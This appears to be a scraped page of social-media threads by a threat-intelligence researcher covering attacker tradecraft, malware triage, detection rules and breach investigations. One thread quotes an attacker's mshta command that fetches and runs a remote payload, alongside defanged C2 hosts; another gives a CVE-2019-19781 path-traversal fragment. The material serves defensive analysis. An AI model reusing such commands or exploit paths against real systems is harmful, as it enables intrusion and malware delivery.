Nick Carr Profile picture
Lead, Cyber Crime Intelligence + Tradecraft @Microsoft (#MSTIC) Previous: Director, Incident Response + Research @Mandiant 🦅 & @CISAgov Chief Technical Analyst
Steve YARA FLOSS Synapse Miller Profile picture 1 subscribed
May 2, 2023 5 tweets 4 min read
I understand there’s renewed interest in operational timelines re:SolarWinds supply chain compromise attackers

Was proud to publish this one within a week of staying up overnight & discovering how the attackers were persisting with backdoored applications.

Many other methods…… Image The value of our (+@cglyer) real-time attacker technique collaboration with absolute beasts in the industry @doughsec 😶‍🌫️, @penninajx + @srunnels 💻 cannot be overstated bringing together puzzle pieces for the RE wizards on each side
Mar 23, 2022 4 tweets 4 min read
We've been tracking DEV-0537 since 2021 (overlaps: Lapsus$, UNC3661). Here's a comprehensive 🆕 BLOG 📰 covering observed TTPs:…

#MSTIC and Defender threat intel collab
#DART 👻 incident response team experience from the trenches [1/3] The blog highlights varied initial access vectors and a slew of [inconsistent?] end goals: data theft, extortion, chaos...

One way to interpret "this actor's TTPs and infrastructure are constantly changing" is that they are loosely-organized (see: ) [2/3]
Dec 14, 2020 9 tweets 5 min read
So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover?

Start here:… 🤩

But then what?? Let’s talk about some post-compromise techniques... Please read the above blog to appreciate multiple backdoors used, careful & unique tradecraft used on-premise...

We just published more details on what we’ve been finding post-compromise:…
ADFS key material compromise, SAML shenanigans, OAuth keys added...
Sep 10, 2020 4 tweets 3 min read
Added #STRONTIUM election-related credential harvesting campaign "detection" to #AzureSentinel:…

Yes - it's hardcoded for netblocks released in the #MSTIC report (…)
This is just extra coverage on top of existing cred harvesting logic That said, the logic posted there finds some high fidelity #STRONTIUM campaigns from at least June through... recently (more details in above blog).

You'll see a User-Agent, first/last attempt, # of total attempts, # of unique IPs & unique accounts attempted + a list of accounts
Sep 10, 2020 7 tweets 5 min read
Pokéregex Challenge:
How many of the 719 Pokémon can you capture in a single regular expression that fits in a tweet?

Here's what to match:…

Here are awesome regex resources:… [this same text blob will also be used to measure FPs😊] If you haven't done something like this before, here's a [crappy] bash one-liner to start:

sh -c 'pattern="your|regex"; echo 🎯 Pokémon:; curl -s… | grep -ioE $pattern | wc -l; echo 🚯 Noise:; curl -s… | grep -ioE $pattern | wc -l'
Jul 31, 2020 8 tweets 5 min read
I started playing Pokémon Go with my kids at the start of the COVID-19 pandemic.

I can’t believe how many #infosec Pokémon we’ve caught so far.

Here’s a quick thread – please add since I’m missing many.

First up: I definitely appreciate that they included #FIN7 in this game Image That last one was much harder to capture than these Iranian TTP Pokémon. ImageImage
Apr 3, 2020 4 tweets 6 min read
🆕 Job Update: I'm joining @Microsoft!

On the #MSTIC R&D team:
☁️🏹hunting & investigations in the cloud (#AzureSentinel, @Office365)
🎯✍️🏽writing detections for several platforms
👥🎁community-based research & sharing
🛡️🤲🏽protecting those who need it the most #DefendingDemocracy Honored to work for @JohnLaTwC & @LeahLease
I'm pumped to grow with & learn from so many amazing security engineers and analysts in #MSTIC:… #FF

My new East Coast crew includes the #APT hunters in Reston, @Cyb3rWard0g, and some random @cglyer guy 😅

Apr 2, 2020 9 tweets 6 min read
OK so this is my last week at @Mandiant / @FireEye 😢

Here's the truth:
♥️ Joining Mandiant was the best decision of my career – the people & company have been SO good to me
🧠 Many of the brilliant minds in security are here & we have FUN every day

💻🔍 There is no better professional #infosec experience than responding to the intrusions that matter & defending at-scale alongside awesome people. If you have the chance to work here – .
🗓️ One year here is worth many more in experience. So here are some highlights:
Apr 1, 2020 9 tweets 5 min read
🧾Stock Tax Tip
For years, I've seen teammates pay double taxes on stock grants. And *many* individuals & tax advisors prepare it incorrectly. ☹️

If you're fortunate enough to have sell-to-cover Restricted Stock Unit (RSU) grants – this probably needs adjusted.

Here's the fix: There may be a tiny caveat in your broker's documentation suggesting you will be double taxed. I heard it was due to a rule change in 2014 (…).

Pictured: the single note in an eTrade PDF.

The impact can be several thousands of dollars overpaid each year...
Mar 9, 2020 4 tweets 3 min read
🧐Fascinating .XLS file just uploaded to VT:…
In addition to some wild 🈸️Chinese phrase translations, its macros drop an [InternetShortcut] file to disk:
The shortcut's URL (stored within Sheet2) is this GIF⤵️ of how to launch the .xls file Screenshots:
1⃣ - 🩳✂️: ThisWorkbook macro dropping the instructional GIF .url to disk
2⃣- 🌐🖼️: Sheet2 contains the .url shortcut's remote GIF location
3⃣ - 🚗🏃🏽: tdole macro allowing helpful translation spreadsheet to auto-run

🧵More .URL shortcuts: ImageImageImage
Feb 28, 2020 5 tweets 2 min read
3 of these XLSMs uploaded to VT in last 2 days. Fresh one from this afternoon:…
❔Interview question: is this “malware” & why do you say that? If your job was to decide whether to let it through, alert, or block it globally – what’s your pick? [polls below] ImageImageImageImage 👆🏼Is this “malware” & why? <replies welcome>
Feb 18, 2020 4 tweets 5 min read
Always nice when a payload has robust documentation.
This one details the exact bypasses implemented.

Version control shows 2016 @Cneelis method replaced with that @_RastaMouse new new.

👉🏽 "Program.cs" #InstallUtil payload with 0 VT detections btw:… ImageImage @Cneelis @_RastaMouse Uploaded 4 hours ago. (🆕)
0/60 static detections is *sorta* expected - it'd be interesting to see how security tech performs when this is loaded by #InstallUtil - should be caught then.

Anyway, great payload comments! [more pictured] ImageImage
Feb 14, 2020 4 tweets 5 min read
"salesforce.docx" uploaded yesterday
Low static detection (4/60):…
Embedded executable "salesforce_report.exe"
• election-themed PE data
• probably #Trickbot 🤹🏽‍♂️🤖
• comms with: 181.112.157[.]42:449 (that cert 👀) & 193.26.217[.]243 ImageImageImage "salesforce.docx"
MD5: ab284dccb09484ff6a3a116152edcb75

MD5: 3e0aff10a361a752ab160228410f2432
<Not on VT>
I've shared here:
Feb 10, 2020 11 tweets 11 min read
🔥 "Hacking Tracking Pix & Macro Stomping Tricks"

On this 🆕 #StateOfTheHack, @cglyer👨🏼‍🦲 & I break down trendy tradecraft.

Special guests:
👨🏻 Macro stomping (@a_tweeter_user)
👨🏻‍🦱 CVE exploitation in the trenches (@_bromiley)

👇🏼Episode Recap Thread! 🧵 We start with tracking pixels: ◻️ <spacer.gif>
We break down how marketing tools are used by attackers looking to learn more about their planned victim's behavior and system - prior to sending any first stage malware.
For some background, see this thread:
Jan 30, 2020 4 tweets 3 min read
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching:

mshta http:\\pastebin[.]com\raw\JF0Zjp3g
⚠️ note: simple backslash URL trick
💆 know: "4D 5A" (MZ)

🔚 Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX
C2: cugugugu.duckdns[.]org Image You should process these at scale and - outside of training - it's not a good use of time to step through them manually.

👨‍💻btw if you like network infrastructure triage, that DuckDNS C2 resolves to an IP address with :3389 open, serving up an SSL certificate exposing a hostname.
Jan 17, 2020 9 tweets 10 min read
In response to increased U.S.-Iran tensions & concerns of retaliatory cyber attacks, Iranian intrusion experts @sj94356 & @QW5kcmV3 are on #StateOfTheHack for the latest on all things Iran: #APT33 #APT34 #APT35 #APT39 #MuddyWater & active UNC groups 🇮🇷👨‍💻🕵️‍♂️ @sj94356 @QW5kcmV3 Wait, did @YouTube remove the #StateOfTheHack episode? 👉 👀
Are we being oppressed? Do they think this is a U.S.-Iran influence operation? ... is it? 🇺🇸🇮🇷Am I going to get a bunch of weird #MAGA replies to this tweet? I have so many questions 😅🙃 ImageImage
Jan 15, 2020 5 tweets 5 min read
For flowbits in @snort 🐷, order matters:

In Suricata, flowbits:isset is checked after the fast pattern match but before other content matches.

In Snort, flowbits:isset is checked in the order it appears in the rule, from left to right.

Source:… @snort I really like using flowbits for exploitation attempts & responses.
I started doing this when tackling those massive #Struts vulns. And today we explained how to use them for CVE-2019-19781:… Image
Jan 14, 2020 6 tweets 17 min read
🚨 New blog with @_bromiley on CVE-2019-19781 - "I Promise It'll Be 200 OK", covering:
• ASCII encoding trick evading most (all?) public rules /.%2e/%76pns/ 👀
@snort 🐷 #detection tricks (negative distance, exploitation flowbits)
#DFIR tips ⤵️ ImageImage @_bromiley @snort @mpgn_x64 @TrustedSec @4real_br4nd4n @BakedSec @sans_isc @FireEye @Mandiant Blog contains a sampling of CVE-2019-19781 post-compromise activity:…

Quick & dirty #DFIR searches (use zgrep) in /var/log/
httpaccess.* : 'GET.*\.xml HTTP/1\.1\" 200' [use -B 1]
httpaccess.* : '/vpn/\.\./'
bash.* : 'nobody'
Dec 20, 2019 4 tweets 4 min read
#InstallUtil payloads are still very popular for code execution and app whitelisting bypass.

Here's a fresh sample with a #GRUNT payload: "compliancesignature.cs"
MD5: f55c0c165f30df6d92fbb50bf7688dc5…
0/59 static detections.
So I'll share some rules!
👇👇 ImageImage Identify suspicious #InstallUtil code execution payloads with a syntax-based #Yara rule (…) from this thread () on a *pretty damn similar* sample 🧐

Also look closely at both samples' embedded PE information (Original/InternalName) 😉 Image
Dec 4, 2019 6 tweets 11 min read
🔨A Tough Outlook for Home Page Attacks
Blog has #APT33 🇮🇷, #APT34 🇮🇷, and #UNC1194 🏴󠁵󠁳󠁯󠁨󠁿😉 home page persistence & RCE.
🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide!
😱Cool TTPs (pictured) #GuardrailsOfTheGalaxy UNC1194 macros and CVE-2017...Domain guardrail, Azure sto... Here is the #UNC1194 first stage (recon) payload stored in an attacker-controlled @Azure storage blob:
Pretty neat that the attacker (@TrustedSec) can conduct a full intrusion by just swapping the storage blob content for the next stage!
Nov 19, 2019 4 tweets 5 min read
How to tell that the ridiculously overcomplicated VBA macro function you're staring at is maybe just rolling its own Base64: accounting for padding

Decoded @digitalocean server:

👨🏼‍🎓"Classeur1.xlsm" (7/58):…
Uploaded from Tunis, 🇹🇳
[1/3] ImageImage It's reasonable to expect an aspiring detection engineer to explain what's going on here.

You should know what |4d 5a| means.

You should be able to explain the rudimentary D1, D2, and D3 evasion functions.
[2/2] ImageImage